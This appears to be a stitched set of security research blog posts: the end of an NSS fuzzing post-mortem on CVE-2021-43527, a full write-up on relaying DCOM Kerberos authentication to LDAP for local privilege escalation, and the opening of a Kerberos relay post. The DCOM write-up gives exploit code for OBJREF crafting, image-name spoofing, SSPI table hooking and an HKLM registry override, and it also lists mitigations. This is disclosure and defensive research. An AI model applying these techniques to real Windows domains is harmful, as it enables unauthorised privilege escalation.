The fuzzer I was using is able to isolate and extract interesting new ASN.1 OIDs, SEQUENCEs, INTEGERs, and so on. Once extracted, it can then randomly combine or insert them into template data. This isn’t really a new idea, but is a new implementation. I'm planning to open source this code in the future.
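
To illustrate the record-isolation idea for the ASN.1 case, here is a minimal sketch of a DER TLV walker. This is my own simplified example, not the fuzzer's actual code: it ignores multi-byte tags and doesn't recurse into constructed types.

#include <cstdint>
#include <cstddef>
#include <vector>
#include <utility>

// Return (offset, length) of each top-level TLV item so a fuzzer could
// extract, mutate and recombine individual records.
std::vector<std::pair<size_t, size_t>> tlv_items(const uint8_t* d, size_t n) {
    std::vector<std::pair<size_t, size_t>> items;
    size_t off = 0;
    while (off + 2 <= n) {
        size_t start = off++;                    // tag byte
        size_t len = d[off++];
        if (len & 0x80) {                        // long-form length
            size_t nbytes = len & 0x7f;
            if (nbytes == 0 || nbytes > sizeof(size_t) || off + nbytes > n)
                break;
            len = 0;
            for (size_t i = 0; i < nbytes; ++i)
                len = (len << 8) | d[off++];
        }
        if (len > n - off)
            break;
        off += len;
        items.emplace_back(start, off - start);
    }
    return items;
}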

Do these approaches work?

I wish that I could say that discovering this bug validates my ideas, but I’m not sure it does. I was doing some moderately novel fuzzing, but I see no reason this bug couldn’t have been found earlier with even rudimentary fuzzing techniques.

Lessons Learned

How did extensive, customized fuzzing with impressive coverage metrics fail to discover this bug?

What went wrong

Issue #1 Missing end-to-end testing.

NSS is a modular library. This layered design is reflected in the fuzzing approach, as each component is fuzzed independently. For example, the QuickDER decoder is tested extensively, but the fuzzer simply creates and discards objects and never uses them.

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
  char *dest[2048];

  for (auto tpl : templates) {
    PORTCheapArenaPool pool;
    SECItem buf = {siBuffer, const_cast<unsigned char *>(Data),
                   static_cast<unsigned int>(Size)};
    PORT_InitCheapArena(&pool, DER_DEFAULT_CHUNKSIZE);
    (void)SEC_QuickDERDecodeItem(&pool.arena, dest, tpl, &buf);
    PORT_DestroyCheapArena(&pool);
  }
  return 0;
}

Fig 5. The QuickDER fuzzer simply creates and discards objects. This verifies the ASN.1 parsing, but not whether other components handle the resulting objects correctly.

This fuzzer might have produced a SECKEYPublicKey that could have reached the vulnerable code, but as the result was never used to verify a signature, the bug could never be discovered.

Issue #2 Arbitrary size limits.

There is an arbitrary limit of 10000 bytes placed on fuzzed input. There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully.

A reasonable choice might be 2^24 - 1 bytes (16,777,215), the largest possible certificate that can be presented by a server during a TLS handshake negotiation, as the certificate length field in a TLS handshake is 24 bits wide.

While NSS might handle objects even larger than this, TLS cannot possibly be involved, reducing the overall severity of any vulnerabilities missed.

Issue #3 Misleading metrics.

All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz, rather than their individual coverage. This data proved misleading, as the vulnerable code is fuzzed extensively but by fuzzers that could not possibly generate a relevant input.

This is because fuzzers like the tls_server_target use fixed, hardcoded certificates. This exercises code relevant to certificate verification, but only fuzzes TLS messages and protocol state changes.

What Worked

  • The design of the mozilla::pkix validation library prevented this bug from being worse than it could have been. Unfortunately it is unused outside of Firefox and Thunderbird.

It’s debatable whether this was just good fortune or not. It seems likely RSA-PSS would eventually be permitted by mozilla::pkix, even though it is not currently.

Recommendations

This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.

Short Term

  • Raise the maximum size of ASN.1 objects produced by libFuzzer from 10,000 to 2^24 - 1 = 16,777,215 bytes.
  • The QuickDER fuzzer should call some relevant APIs with any objects successfully created before destroying them.
  • The oss-fuzz code coverage metrics should be divided by fuzzer, not by project.

Solution

This vulnerability is CVE-2021-43527, and is resolved in NSS 3.73.0. If you are a vendor that distributes NSS in your products, you will most likely need to update or backport the patch.

Credits

I would not have been able to find this bug without assistance from my colleagues from Chrome, Ryan Sleevi and David Benjamin, who helped answer my ASN.1 encoding questions and engaged in thoughtful discussion on the topic.

Thanks to the NSS team, who helped triage and analyze the vulnerability.


[1] In this minimal example, a workaround if source was available would be to use a combination of sancov's data-flow instrumentation options, but that also fails on more complex variants.

Windows Exploitation Tricks: Relaying DCOM Authentication

20 October 2021 at 16:38

Posted by James Forshaw, Project Zero

In my previous blog post I discussed the possibility of relaying Kerberos authentication from a DCOM connection. I was originally going to provide a more in-depth explanation of how that works, but as it's quite involved I thought it was worthy of its own blog post. This is primarily a technique to get relay authentication from another user on the same machine and forward that to a network service such as LDAP. You could use this to escalate privileges on a host using a technique similar to a blog post from Shenanigans Labs but removing the requirement for the WebDAV service. Let's get straight to it.

Background

The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits, the latest in that line being RemotePotato which is currently unpatched as of October 2021.

The key feature that the exploit abused is standard COM marshaling. Specifically when a COM object is marshaled so that it can be used by a different process or host, the COM runtime generates an OBJREF structure, most commonly the OBJREF_STANDARD form. This structure contains all the information necessary to establish a connection between a COM client and the original object in the COM server.

Connecting to the original object from the OBJREF is a two part process:

  1. The client extracts the Object Exporter ID (OXID) from the structure and contacts the OXID resolver service specified by the RPC binding information in the OBJREF.
  2. The client uses the OXID resolver service to find the RPC binding information of the COM server which hosts the object and establishes a connection to the RPC endpoint to access the object's interfaces.

Both of these steps require establishing an MSRPC connection to an endpoint. Commonly this is either locally over ALPC, or remotely via TCP. If a TCP connection is used then the client will also authenticate to the RPC server using NTLM or Kerberos based on the security bindings in the OBJREF.

The first key insight I had for issue 325 is that you can construct an OBJREF which will always establish a connection to the OXID resolver service over TCP, even if the service was on the local machine. To do this you specify the hostname as an IP address and an arbitrary TCP port for the client to connect to. This allows you to listen locally and when the RPC connection is made the authentication can be relayed or repurposed.

This isn't yet a privilege escalation, since you need to convince a privileged user to unmarshal the OBJREF. This was the second key insight: you could get a privileged service to unmarshal an arbitrary OBJREF easily using the CoGetInstanceFromIStorage API and activating a privileged COM service. This marshals a COM object, creates the privileged COM server and then unmarshals the object in the server's security context. This results in an RPC call to the fake OXID resolver authenticated using a privileged user's credentials. From there the authentication could be relayed to the local system for privilege escalation.

Diagram of a DCOM authentication relay attack from issue 325
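
A hedged sketch of that activation trick in C++ (the privileged CLSID and the IStorage preparation are placeholders; real code must first marshal the object into the storage, and the program must link against ole32.lib):

#include <windows.h>
#include <objbase.h>

// Ask COM to activate a privileged out-of-process class and unmarshal the
// object stored in stg inside that server's security context.
HRESULT TriggerUnmarshal(REFCLSID privilegedClsid, IStorage* stg) {
    MULTI_QI mqi = {};
    mqi.pIID = &IID_IUnknown;
    return CoGetInstanceFromIStorage(
        nullptr,                               // no remote server info
        const_cast<CLSID*>(&privilegedClsid),  // some privileged COM class
        nullptr,                               // no aggregation
        CLSCTX_LOCAL_SERVER,                   // out-of-process activation
        stg,                                   // holds the marshaled OBJREF
        1, &mqi);
}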

Being able to redirect the OXID resolver RPC connection locally to a different TCP port was not by design and Microsoft eventually fixed this in Windows 10 1809/Server 2019. The underlying issue prior to Windows 10 1809 was the string containing the host returned as part of the OBJREF was directly concatenated into an RPC string binding. Normally the RPC string binding should have been in the form of:

ncacn_ip_tcp:ADDRESS[135]

Where ncacn_ip_tcp is the protocol sequence for RPC over TCP, ADDRESS is the target address which would come from the string binding, and [135] is the well-known TCP port for the OXID resolver appended by RPCSS. However, as the ADDRESS value is inserted manually into the binding then the OBJREF could specify its own port, resulting in the string binding:

ncacn_ip_tcp:ADDRESS[9999][135]

The RPC runtime would just pick the first port in the binding string to connect to, in this case 9999, and would ignore the second port 135. This behavior was fixed by calling the RpcStringBindingCompose API, which correctly escapes the additional port number, ensuring it's ignored when making the RPC connection.
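
For illustration, the fix boils down to composing the binding with the proper API rather than concatenating strings. A minimal sketch (the address value stands in for attacker input; link against rpcrt4.lib):

#include <windows.h>
#include <rpc.h>
#include <cstdio>

int main() {
    RPC_WSTR binding = nullptr;
    // With manual concatenation, the embedded "[9999]" became the preferred
    // endpoint. RpcStringBindingCompose escapes the address so that only the
    // appended well-known port 135 is used.
    RPC_STATUS status = RpcStringBindingComposeW(
        nullptr,                       // no object UUID
        (RPC_WSTR)L"ncacn_ip_tcp",     // protocol sequence
        (RPC_WSTR)L"127.0.0.1[9999]",  // hostile address from the OBJREF
        (RPC_WSTR)L"135",              // endpoint appended by RPCSS
        nullptr,                       // no options
        &binding);
    if (status == RPC_S_OK) {
        wprintf(L"%s\n", (wchar_t*)binding);
        RpcStringFreeW(&binding);
    }
    return 0;
}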

This is where the RemotePotato exploit, developed by Antonio Cocomazzi and Andrea Pierini, comes into the picture. While it was no longer possible to redirect the OXID resolving to a local TCP server, you could redirect the initial connection to an external server. A call is made to the IObjectExporter::ResolveOxid2 method which can return an arbitrary RPC binding string for a fake COM object.

Unlike the OXID resolver binding string, the one for the COM object is allowed to contain an arbitrary TCP port. By returning a binding string for the original host on an arbitrary TCP port, the second part of the connection process can be relayed rather than the first. The relayed authentication can then be sent to a domain server, such as LDAP or SMB, as long as they don't enforce signing.

Diagram of a DCOM authentication relay attack from Remote Potato

This exploit has the clear disadvantage of requiring an external machine to act as the target of the initial OXID resolving. While investigating the Kerberos authentication relay attacks for DCOM, could I find a way to do everything on the same machine?

Remote ➜ Local Potato

If we're relaying the authentication for the second RPC connection, could we get the local OXID resolver to do the work for us and resolve to a local COM server on a randomly selected port? One of my goals is to write the least amount of code, which is why we'll do everything in C# and .NET.

byte[] ba = GetMarshalledObject(new object());
var std = COMObjRefStandard.FromArray(ba);

Console.WriteLine("IPID: {0}", std.Ipid);
Console.WriteLine("OXID: {0:X08}", std.Oxid);
Console.WriteLine("OID : {0:X08}", std.Oid);

std.StringBindings.Clear();
std.StringBindings.Add(RpcTowerId.Tcp, "127.0.0.1");

Console.WriteLine("objref:{0}:", Convert.ToBase64String(std.ToArray()));

This code creates a basic .NET object and COM marshals it to a standard OBJREF. I've left out the code for the marshalling and parsing of the OBJREF, but much of that is already present in the linked issue 325. We then modify the list of string bindings to only include a TCP binding for 127.0.0.1, forcing the OXID resolver to use TCP. If you specify a computer's hostname then the OXID resolver will use ALPC instead. Note that the string bindings in the OBJREF are only for binding to the OXID resolver, not the COM server itself.

We can then convert the modified OBJREF into an objref moniker. This format is useful as it allows us to trivially unmarshal the object in another process by calling the Marshal::BindToMoniker API in .NET and passing the moniker string. For example to bind to the COM object in PowerShell you can run the following command:

[Runtime.InteropServices.Marshal]::BindToMoniker("objref:TUVP...:")

Immediately after binding to the moniker a firewall dialog is likely to appear as shown:

Firewall dialog for the COM server when a TCP binding is created

This is requesting the user to allow our COM server process access to listen on all network interfaces for incoming connections. This prompt only appears when the client tries to resolve the OXID as DCOM supports dynamic RPC endpoints. Initially when the COM server starts it only listens on ALPC, but the RPCSS service can ask the server to bind to additional endpoints.

This request is made through an internal RPC interface that every COM server implements for use by the RPCSS service. One of the functions on this interface is UseProtSeq, which requests that the COM server enables a TCP endpoint. When the COM server receives the UseProtSeq call it tries to bind a TCP server to all interfaces, which subsequently triggers the Windows Defender Firewall to prompt the user for access.

Enabling the firewall permission requires administrator privileges. However, as we only need to listen for connections via localhost, we shouldn't need to modify the firewall, and the dialog can be dismissed safely. Going back to the COM client, though, we'll see an error reported.

Exception calling "BindToMoniker" with "1" argument(s):
"The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)"

If we allow our COM server executable through the firewall, the client is able to connect over TCP successfully. Clearly the firewall is affecting the behavior of the COM client in some way even though it shouldn't. Tracing through the unmarshalling process in the COM client, the error is being returned from RPCSS when trying to resolve the OXID's binding information. This would imply that no connection attempt is made, and RPCSS is detecting that the COM server wouldn't be allowed through the firewall and refusing to return any binding information for TCP.

Further digging into RPCSS led me to the following function:

BOOL IsPortOpen(LPWSTR ImageFileName, int PortNumber) {
  INetFwMgr* mgr;

  CoCreateInstance(CLSID_FwMgr, NULL, CLSCTX_INPROC_SERVER,
                   IID_PPV_ARGS(&mgr));
  VARIANT Allowed;
  VARIANT Restricted;
  mgr->IsPortAllowed(ImageFileName, NET_FW_IP_VERSION_ANY,
             PortNumber, NULL, NET_FW_IP_PROTOCOL_TCP,
             &Allowed, &Restricted);
  if (VT_BOOL != Allowed.vt)
    return FALSE;
  return Allowed.boolVal == VARIANT_TRUE;
}

This function uses the HNetCfg.FwMgr COM object, and calls INetFwMgr::IsPortAllowed to determine if the process is allowed to listen on the specified TCP port. This function is called for every TCP binding when enumerating the COM server's bindings to return to the client. RPCSS passes the full path to the COM server's executable and the listening TCP port. If the function returns FALSE then RPCSS doesn't consider it valid and won't add it to the list of potential bindings.

If the OXID resolving process doesn't have any binding at the end of the lookup process it will return the RPC_S_SERVER_UNAVAILABLE error and the COM client will fail to bind to the server. How can we get around this limitation without needing administrator privileges to allow our server through the firewall? We can convert this C++ code into a small PowerShell function to test the behavior of the function to see what would grant access.

function Test-IsPortOpen {
    param(
        [string]$Name,
        [int]$Port
    )
    $mgr = New-Object -ComObject "HNetCfg.FwMgr"
    $allow = $null
    $mgr.IsPortAllowed($Name, 2, $Port, "", 6, [ref]$allow, $null)
    $allow
}

foreach($f in $(ls "$env:WINDIR\system32\*.exe")) {
    if (Test-IsPortOpen $f.FullName 12345) {
        Write-Host $f.FullName
    }
}

This script enumerates all executable files in system32 and checks if they'd be allowed to connect to TCP port 12345. Normally the TCP port would be selected automatically, however the COM server can use the RpcServerUseProtseqEp API to pre-register a known TCP port for RPC communication, so we'll just pick port 12345.
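
Pre-registering the endpoint is a one-liner in the RPC runtime; a minimal sketch of what a COM server might do (assuming it links against rpcrt4.lib):

#include <windows.h>
#include <rpc.h>

// Register a well-known TCP endpoint (port 12345) for this process's RPC
// server rather than letting the runtime pick a dynamic port.
RPC_STATUS RegisterFixedTcpPort() {
    return RpcServerUseProtseqEpW(
        (RPC_WSTR)L"ncacn_ip_tcp",        // RPC over TCP
        RPC_C_PROTSEQ_MAX_REQS_DEFAULT,   // default call backlog
        (RPC_WSTR)L"12345",               // fixed endpoint (TCP port)
        nullptr);                         // default security descriptor
}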

The only executable in system32 that returns true from Test-IsPortOpen is svchost.exe. That makes some sense, the default firewall rules usually permit a limited number of services to be accessible through the firewall, the majority of which are hosted in a shared service process.

This check doesn't guarantee a COM server will be allowed through the firewall, just that it's potentially accessible in order to return a TCP binding string. As the connection will be via localhost we don't need to be allowed through the firewall, only that IsPortOpen thinks we could be open. How can we spoof the image filename?

The obvious trick would be to create a svchost.exe process and inject our own code into it. However, that is harder to achieve through pure .NET code, and injecting into an svchost executable is a red flag for anything monitoring for malicious code, which might make the exploit unreliable. Instead, perhaps we can influence the image filename used by RPCSS?

Digging into the COM runtime, when a COM server registers itself with RPCSS it passes its own image filename as part of the registration information. The runtime gets the image filename through a call to GetModuleFileName, which gets the value from the ImagePathName field in the process parameters block referenced by the PEB.

We can modify this string in our own process to be anything we like, then when COM is initialized, that will be sent to RPCSS which will use it for the firewall check. Once the check passes, RPCSS will return the TCP string bindings for our COM server when unmarshalling the OBJREF and the client will be able to connect. This can all be done with only minor in-process modifications from .NET and no external servers required.
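To illustrate, below is a minimal sketch of what such a SetProcessModuleName helper could look like. This is my reconstruction rather than the exact exploit code: it assumes a 64-bit process (the PEB and UNICODE_STRING offsets are x64-specific) and omits error handling.

[StructLayout(LayoutKind.Sequential)]
struct PROCESS_BASIC_INFORMATION
{
    public IntPtr Reserved1;
    public IntPtr PebBaseAddress;
    public IntPtr Reserved2_0;
    public IntPtr Reserved2_1;
    public IntPtr UniqueProcessId;
    public IntPtr Reserved3;
}

[DllImport("ntdll.dll")]
static extern int NtQueryInformationProcess(IntPtr ProcessHandle,
    int ProcessInformationClass, out PROCESS_BASIC_INFORMATION Information,
    int InformationLength, out int ReturnLength);

static string SetProcessModuleName(string name)
{
    // Find the PEB, then the RTL_USER_PROCESS_PARAMETERS block it references.
    NtQueryInformationProcess(
        System.Diagnostics.Process.GetCurrentProcess().Handle, 0,
        out var pbi, Marshal.SizeOf<PROCESS_BASIC_INFORMATION>(), out _);
    IntPtr processParams = Marshal.ReadIntPtr(pbi.PebBaseAddress, 0x20);
    IntPtr imagePathName = IntPtr.Add(processParams, 0x60);
    // Read the old ImagePathName UNICODE_STRING so we can restore it later.
    int length = Marshal.ReadInt16(imagePathName);
    IntPtr buffer = Marshal.ReadIntPtr(imagePathName, 8);
    string oldName = Marshal.PtrToStringUni(buffer, length / 2);
    // Point the UNICODE_STRING at a fresh native buffer with the fake name.
    Marshal.WriteInt16(imagePathName, 0, (short)(name.Length * 2));
    Marshal.WriteInt16(imagePathName, 2, (short)((name.Length + 1) * 2));
    Marshal.WriteIntPtr(imagePathName, 8, Marshal.StringToHGlobalUni(name));
    return oldName;
}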

Capturing Authentication

At this point a new RPC connection will be made to our process to communicate with the marshaled COM object. During that process the COM client must authenticate, so we can capture and relay that authentication to another service locally or remotely. What's the best way to capture that authentication traffic?

Before we do anything we need to select what authentication we want to receive, and this will be reflected in the OBJREF's security bindings. As we're doing everything using the existing COM runtime we can register what RPC authentication services to use when calling CoInitializeSecurity in the COM server through the asAuthSvc parameter.

var svcs = new SOLE_AUTHENTICATION_SERVICE[] {
    new SOLE_AUTHENTICATION_SERVICE() {
      dwAuthnSvc = RpcAuthenticationType.Kerberos,
      pPrincipalName = "HOST/DC.domain.com"
    }
};

var str = SetProcessModuleName("System");
try
{
   CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,
        IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,
        ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,
        EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,
        IntPtr.Zero);
}
finally
{
    SetProcessModuleName(str);
}

In the above code, we register to only receive Kerberos authentication and we can also specify an arbitrary SPN as I described in the previous blog post. One thing to note is that the call to CoInitializeSecurity will establish the connection to RPCSS and pass the executable filename. Therefore we need to modify the filename before calling the API as we can't change it after the connection has been established.

For swag points I specify the filename System rather than build the full path to svchost.exe. This is the name assigned to the kernel which is also granted access through the firewall. We restore the original filename after the call to CoInitializeSecurity to reduce the risk of it breaking something unexpectedly.

That covers the selection of the authentication service to use, but doesn't help us actually capture that authentication. My first thought to capture the authentication was to find the socket handle for the TCP server, close it and create a new socket in its place. Then I could directly process the RPC protocol and parse out the authentication. This felt somewhat risky as the RPC runtime would still think it has a valid TCP server socket and might fail in unexpected ways. Also it felt like a lot of work, when I have a perfectly good RPC protocol parser built into Windows.

I then resigned myself to hooking the SSPI APIs, although ideally I'd prefer not to do so. However, once I started looking at the RPC runtime library there weren't any imports for the SSPI APIs to hook into and I really didn't want to patch the functions themselves. It turns out that the RPC runtime loads security packages dynamically, based on the authentication service requested and the configuration of the HKLM\SOFTWARE\Microsoft\Rpc\SecurityService registry key.

Screenshot of the Registry Editor showing HKLM\SOFTWARE\Microsoft\Rpc\SecurityService key

The key, shown in the above screenshot, has a list of values. The value's name is the number assigned to the authentication service; for example, 16 is RPC_C_AUTHN_GSS_KERBEROS. The value's data is then the name of the DLL to load which provides the API; for Kerberos this is sspicli.dll.
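If you want to inspect these mappings on your own system, a small sketch using the .NET registry classes will dump them (the output format is my own):

using Microsoft.Win32;
using System;

// List the RPC security service mappings, e.g. "16 = sspicli.dll"
// where 16 is RPC_C_AUTHN_GSS_KERBEROS.
using (var key = Registry.LocalMachine.OpenSubKey(
    @"SOFTWARE\Microsoft\Rpc\SecurityService"))
{
    foreach (string name in key.GetValueNames())
    {
        Console.WriteLine($"{name} = {key.GetValue(name)}");
    }
}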

The RPC runtime then loads a table of security functions from the DLL by calling its exported InitSecurityInterface method. At least for sspicli the table is always the same and is a pre-initialized structure in the DLL's data section. This is perfect: we can just call InitSecurityInterface before the RPC runtime is initialized to get a pointer to the table, then modify its function pointers to point to our own implementation of the API. As an added bonus the table is in a writable section of the DLL, so we don't even need to modify the memory protection.
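The patching itself can be fairly small. The following is a minimal sketch, assuming a 64-bit process; the table offset calculation and the simplified AcceptSecurityContext delegate signature are my own assumptions based on the SecurityFunctionTableW layout:

[DllImport("sspicli.dll")]
static extern IntPtr InitSecurityInterfaceW();

delegate int AcceptSecurityContextFn(IntPtr phCredential, IntPtr phContext,
    IntPtr pInput, int fContextReq, int TargetDataRep, IntPtr phNewContext,
    IntPtr pOutput, out int pfContextAttr, IntPtr ptsExpiry);

static AcceptSecurityContextFn _original;
static AcceptSecurityContextFn _hook;

static int HookedAcceptSecurityContext(IntPtr phCredential, IntPtr phContext,
    IntPtr pInput, int fContextReq, int TargetDataRep, IntPtr phNewContext,
    IntPtr pOutput, out int pfContextAttr, IntPtr ptsExpiry)
{
    // Capture or relay the client's AP_REQ from pInput here, then
    // call through to the real implementation.
    return _original(phCredential, phContext, pInput, fContextReq,
        TargetDataRep, phNewContext, pOutput, out pfContextAttr, ptsExpiry);
}

static void InstallHook()
{
    IntPtr table = InitSecurityInterfaceW();
    // The table starts with a ULONG version field (padded to pointer size
    // on x64); AcceptSecurityContext is the 7th function pointer entry.
    int offset = IntPtr.Size + 6 * IntPtr.Size;
    _original = Marshal.GetDelegateForFunctionPointer<AcceptSecurityContextFn>(
        Marshal.ReadIntPtr(table, offset));
    _hook = HookedAcceptSecurityContext; // keep the delegate alive
    // The table is in a writable data section, so no VirtualProtect needed.
    Marshal.WriteIntPtr(table, offset,
        Marshal.GetFunctionPointerForDelegate(_hook));
}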

Of course implementing the hooks is non-trivial. This is made more complex because RPC uses the DCE style Kerberos authentication which requires two tokens from the client before the server considers the authentication complete. This requires maintaining more state to keep the RPC server and client implementations happy. I'll leave this as an exercise for the reader.

Choosing a Relay Target Service

The next step is to choose a suitable target service to relay the authentication to. For issue 325 I relayed the authentication to the same machine's DCOM activator RPC service and was able to achieve an arbitrary file write.

I thought that maybe I could do so again, so I modified my .NET RPC client to handle the relayed authentication and tried accessing local RPC services. No matter what RPC server or function I called, I always got an access denied error. Even if I wrote my own RPC server which didn't have any checks, it would fail.

Digging into the failure it turned out that at some point (I don't know specifically when), Microsoft added a mitigation into the RPC runtime to make it very difficult to relay authentication back to the same system.

void SSECURITY_CONTEXT::ValidateUpgradeCriteria() {
  if (this->AuthnLevel < RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) {
    if (IsLoopback())
      this->UnsafeLoopbackAuth = TRUE;
  }
}

The SSECURITY_CONTEXT::ValidateUpgradeCriteria method is called when receiving RPC authentication packets. If the authentication level for the RPC connection is less than RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, such as RPC_C_AUTHN_LEVEL_PKT_CONNECT, and the authentication came from the same system, then a flag is set to true in the security context. The IsLoopback function calls the QueryContextAttributes API for the undocumented SECPKG_ATTR_IS_LOOPBACK attribute value from the server security context. This attribute indicates if the authentication was from the local system.

When an RPC call is made the server will check the flag; if it's true the call is immediately rejected before any code is called in the server, including the RPC interface's security callback. The only way to pass this check is for the authentication to not come from the local system, or for the authentication level to be RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above, which then requires the client to know the session key for signing or encryption. The RPC client will also check for local authentication and will increase the authentication level if necessary. This is an effective way of preventing the relay of local authentication to elevate privileges.

Instead, as I was focussing on Kerberos, I came to the conclusion that relaying the authentication to an enterprise network service was more useful. As the default settings for a domain controller's LDAP service still do not enforce signing, it seemed a reasonable target. As we'll see, this limits the possible sources of the authentication: they must not enable Integrity, otherwise the LDAP server will enforce signing.

The problem with LDAP is that I didn't have any code which implemented the protocol. I'm sure there is some .NET code to do it somewhere, but the fewer dependencies I have the better. As I mentioned in the previous blog post, Windows has a built-in LDAP library in wldap32.dll. Could I repurpose its API to use relayed authentication instead?

Unsurprisingly the library doesn't have an "enable relayed authentication" mode, but after a few minutes in a disassembler it was clear it was also delay-loading the SSPI interfaces through the InitSecurityInterface method, so I could repurpose my authentication capture code to perform the relay. There was one minor issue: accidentally or on purpose, there was a stray call to QueryContextAttributes which was directly imported, so I needed to patch that through an Import Address Table (IAT) hook, as distasteful as that was.

There was still a problem however. When the client connects it always tries to enable LDAP signing, as we are relaying authentication with no access to the session key this causes the connection to fail. Setting the option value LDAP_OPT_SIGN in the library to false didn't change this behavior. I needed to set the LdapClientIntegrity registry value to 0 in the LDAP service's key before initializing the library. Unfortunately that key is only modifiable by administrators. I could have modified the library itself, but as it was checking the key during DllMain it would be a complex dance to patch the DLL in the middle of loading.

Instead I decided to override the HKEY_LOCAL_MACHINE key. This is possible for the Win32 APIs by using the RegOverridePredefKey API. The purpose of the API is to allow installers to redirect administrator-only modifications to the registry into a writable location, however for our purposes we can also use it to redirect the reading of the LdapClientIntegrity registry value.

[DllImport("Advapi32.dll")]

static extern int RegOverridePredefKey(

    IntPtr hKey,

    IntPtr hNewHKey

);

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]

static extern IntPtr LoadLibrary(string libname);

static readonly IntPtr HKEY_LOCAL_MACHINE = new IntPtr(-2147483646);

static void OverrideLocalMachine(RegistryKey key)

{

    int res = RegOverridePredefKey(HKEY_LOCAL_MACHINE,

        key?.Handle.DangerousGetHandle() ?? IntPtr.Zero);

    if (res != 0)

        throw new Win32Exception(res);

}

static void LoadLDAPLibrary()

{

    string dummy = @"SOFTWARE\DUMMY";

    string target = @"System\CurrentControlSet\Services\LDAP";

    using (var key = Registry.CurrentUser.CreateSubKey(dummy, true))

    {

        using (var okey = key.CreateSubKey(target, true))

        {

            okey.SetValue("LdapClientIntegrity", 0,

                          RegistryValueKind.DWord);

            OverrideLocalMachine(key);

            try

            {

                IntPtr lib = LoadLibrary("wldap32.dll");

                if (lib == IntPtr.Zero)

                    throw new Win32Exception();

            }

            finally

            {

                OverrideLocalMachine(null);

                Registry.CurrentUser.DeleteSubKeyTree(dummy);

            }

        }

    }

}

This code redirects the HKEY_LOCAL_MACHINE key and then loads the LDAP library. Once it's loaded we can then revert the override so that everything else works as expected. We can now repurpose the built-in LDAP library to relay Kerberos authentication to the domain controller. For the final step, we need a privileged COM service to unmarshal the OBJREF to start the process.

Choosing a COM Unmarshaller

The RemotePotato attack assumes that a more privileged user is authenticated on the same machine. However I wanted to see what I could do without that requirement. Realistically the only thing that can be done is to relay the computer's domain account to the LDAP server.

To get access to authentication for the computer account, we need to unmarshal the OBJREF inside a process running as either SYSTEM or NETWORK SERVICE. These local accounts are mapped to the computer account when authenticating to another machine on the network.

We do have one big limitation on the selection of a suitable COM server: it must make the RPC connection using the RPC_C_AUTHN_LEVEL_PKT_CONNECT authentication level. Anything above that will enable Integrity on the authentication, which will prevent us from relaying to LDAP. Fortunately RPC_C_AUTHN_LEVEL_PKT_CONNECT is the default setting for DCOM, but unfortunately all services which use the svchost process change that default to RPC_C_AUTHN_LEVEL_PKT, which enables Integrity.

After a bit of hunting around with OleViewDotNet, I found a good candidate class, CRemoteAppLifetimeManager (CLSID: 0bae55fc-479f-45c2-972e-e951be72c0c1) which is hosted in its own executable, runs as NETWORK SERVICE, and doesn't change any default settings as shown below.

Screenshot of the OleViewDotNet showing the security flags of the CRemoteAppLifetimeManager COM server

The server doesn't change the default impersonation level from RPC_C_IMP_LEVEL_IDENTIFY, which means the negotiated token will only be at SecurityIdentification level. For LDAP, this doesn't matter as it only uses the token for access checking, not to open resources. However, this would prevent using the same authentication to access something like the SMB server. I'm confident that given enough effort, a COM server with both RPC_C_AUTHN_LEVEL_PKT_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE could be found, but it wasn't necessary for my exploit.

Wrapping Up

That's a somewhat complex exploit. However, it does allow for authentication relay, with arbitrary Kerberos tokens, from a local user to LDAP on a default Windows 10 system. Hopefully it provides some ideas for implementing something similar without always needing to write your own protocol servers and clients, instead reusing what's already available.

This exploit is very similar to the existing RemotePotato exploit that Microsoft have already stated will not be fixed. This is because Microsoft considers authentication relay attacks to be an issue with the configuration of the Windows network, such as not enforcing signing on LDAP, rather than the particular technique used to generate the authentication relay. As I mentioned in the previous blog post, at most this would be assessed as a Moderate severity issue which does not reach the bar for fixing as part of regular updates (or potentially, not being fixed at all).

As for mitigating this issue without it being fixed by Microsoft, a system administrator should follow Microsoft's recommendations to enable signing and/or encryption on any sensitive service in the domain, especially LDAP. They can also enable Extended Protection for Authentication where the service is protected by TLS, and configure the default DCOM authentication level to be RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above. These changes would make the relay of Kerberos or NTLM significantly less useful.

Using Kerberos for Authentication Relay Attacks

By: Ryan
20 October 2021 at 16:26

Posted by James Forshaw, Project Zero

This blog post is a summary of some research I've been doing into relaying Kerberos authentication in Windows domain environments. To keep this blog shorter I am going to assume you have a working knowledge of Windows network authentication, and specifically Kerberos and NTLM. For a quick primer on Kerberos see this page which is part of Microsoft's Kerberos extension documentation or you can always read RFC4120.

Background

Windows-based enterprise networks rely on network authentication protocols, such as NT LAN Manager (NTLM) and Kerberos, to implement single sign-on. These protocols allow domain users to seamlessly connect to corporate resources without having to repeatedly enter their passwords. This works by the computer's Local Security Authority (LSA) process storing the user's credentials when the user first authenticates. The LSA can then reuse those credentials for network authentication without requiring user interaction.

However, the convenience of not prompting the user for their credentials when performing network authentication has a downside. To be most useful, common clients for network protocols such as HTTP or SMB must perform the authentication automatically, without user interaction; otherwise it defeats the purpose of avoiding asking the user for their credentials.

This automatic authentication can be a problem if an attacker can trick a user into connecting to a server they control. The attacker could induce the user's network client to start an authentication process and use that information to authenticate to an unrelated service allowing the attacker to access that service's resources as the user. When the authentication protocol is captured and forwarded to another system in this way it's referred to as an Authentication Relay attack.

Simple diagram of an authentication relay attack

